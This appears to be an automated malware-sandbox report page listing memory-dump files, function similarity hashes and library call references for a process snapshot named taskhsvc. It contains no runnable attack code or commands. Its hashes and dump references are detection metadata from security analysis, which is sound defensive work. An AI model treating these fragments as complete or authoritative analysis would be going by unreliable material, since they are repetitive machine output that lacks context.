Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$free
String ID:
API String ID: 2817809126-0
Opcode ID: eda45d449b346bb41d604987b62c2f09fd6a4ebd824da3ff7e3036e35c841a43
Instruction ID: 58130abc75c4948614d1ebad3445e65742fb7809db2ed34fe6116d654fcd3d1b
Opcode Fuzzy Hash: eda45d449b346bb41d604987b62c2f09fd6a4ebd824da3ff7e3036e35c841a43
Instruction Fuzzy Hash: 4DE08C34B102065BCF00FBB9C947A5A73E8EF02308B0658A4A544EB246E634E9005AA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F03E1C Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00EF107E: abort.MSVCRT ref: 00EF10D1
Part of subcall function 00EF107E: malloc.MSVCRT ref: 00EF10E9
Part of subcall function 00EF107E: exit.MSVCRT ref: 00EF112A
Part of subcall function 00EF107E: __stack_chk_fail.LIBSSP-0 ref: 00EF113D

Part of subcall function 00F03BFD: abort.MSVCRT ref: 00F03C50
Part of subcall function 00F03BFD: abort.MSVCRT ref: 00F03CED
Part of subcall function 00F03BFD: abort.MSVCRT ref: 00F03D40
Part of subcall function 00F03BFD: __stack_chk_fail.LIBSSP-0 ref: 00F03D71

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00EB05FC), ref: 00F03E5C

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: abort$__stack_chk_fail$exitmalloc
String ID:
API String ID: 1475546873-0
Opcode ID: 8e04d5e4056811a91d49db3ff9d2e31d6632dd1e6607399a815838809229f24d
Instruction ID: 8ffea15f9036d02ae17ed3e8ca4efa49fad462f48464e5e03b06bca1d7d44898
Opcode Fuzzy Hash: 8e04d5e4056811a91d49db3ff9d2e31d6632dd1e6607399a815838809229f24d
Instruction Fuzzy Hash: 6CE01AB0E0420A8FCB00EFBCC84266DB7F4FF48340F014858D594E7399DB78A941AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DF3734 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00EB6A4B: abort.MSVCRT ref: 00EB6AAF
Part of subcall function 00EB6A4B: abort.MSVCRT ref: 00EB6B04
Part of subcall function 00EB6A4B: __stack_chk_fail.LIBSSP-0 ref: 00EB6B81

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00DFA9F8), ref: 00DF3769

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID:
API String ID: 3276312271-0
Opcode ID: d0851d3dd78600190a30b6fd4ed8aff0a7a896b649dfac861518138651e220e4
Instruction ID: abeffd68cb7237d71aeaedf642d289b43f22dd640233385d9e5f3068e334f6d0
Opcode Fuzzy Hash: d0851d3dd78600190a30b6fd4ed8aff0a7a896b649dfac861518138651e220e4
Instruction Fuzzy Hash: 2DE0B6B4E14209AFCB00EFBDC642A5EBBF0EB09300F45C419A954E7355D634A9129FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D965EF Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

Part of subcall function 00D963F3: __stack_chk_fail.LIBSSP-0 ref: 00D965E4

__stack_chk_fail.LIBSSP-0 ref: 00D96622

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 57ef2d169e1bb73fb42c14d04963c0c4a57c8038f42af78198446bb6614cb5f6
Instruction ID: 6683072bc9a0e6aabf953fd5c002fcd2d2e68d861b51647d48e81b95c07c85e6
Opcode Fuzzy Hash: 57ef2d169e1bb73fb42c14d04963c0c4a57c8038f42af78198446bb6614cb5f6
Instruction Fuzzy Hash: 32E0B670E0021A9BDF00EFBDCA4AAAEBBF0FB05304F484964D410A7305D3B0A9158BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF6573 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

Part of subcall function 00EF6206: abort.MSVCRT ref: 00EF6275
Part of subcall function 00EF6206: fclose.MSVCRT ref: 00EF628D
Part of subcall function 00EF6206: strerror.MSVCRT ref: 00EF62A6
Part of subcall function 00EF6206: abort.MSVCRT ref: 00EF63BD
Part of subcall function 00EF6206: _unlink.MSVCRT ref: 00EF63D0

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,00E90EBF), ref: 00EF65A7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
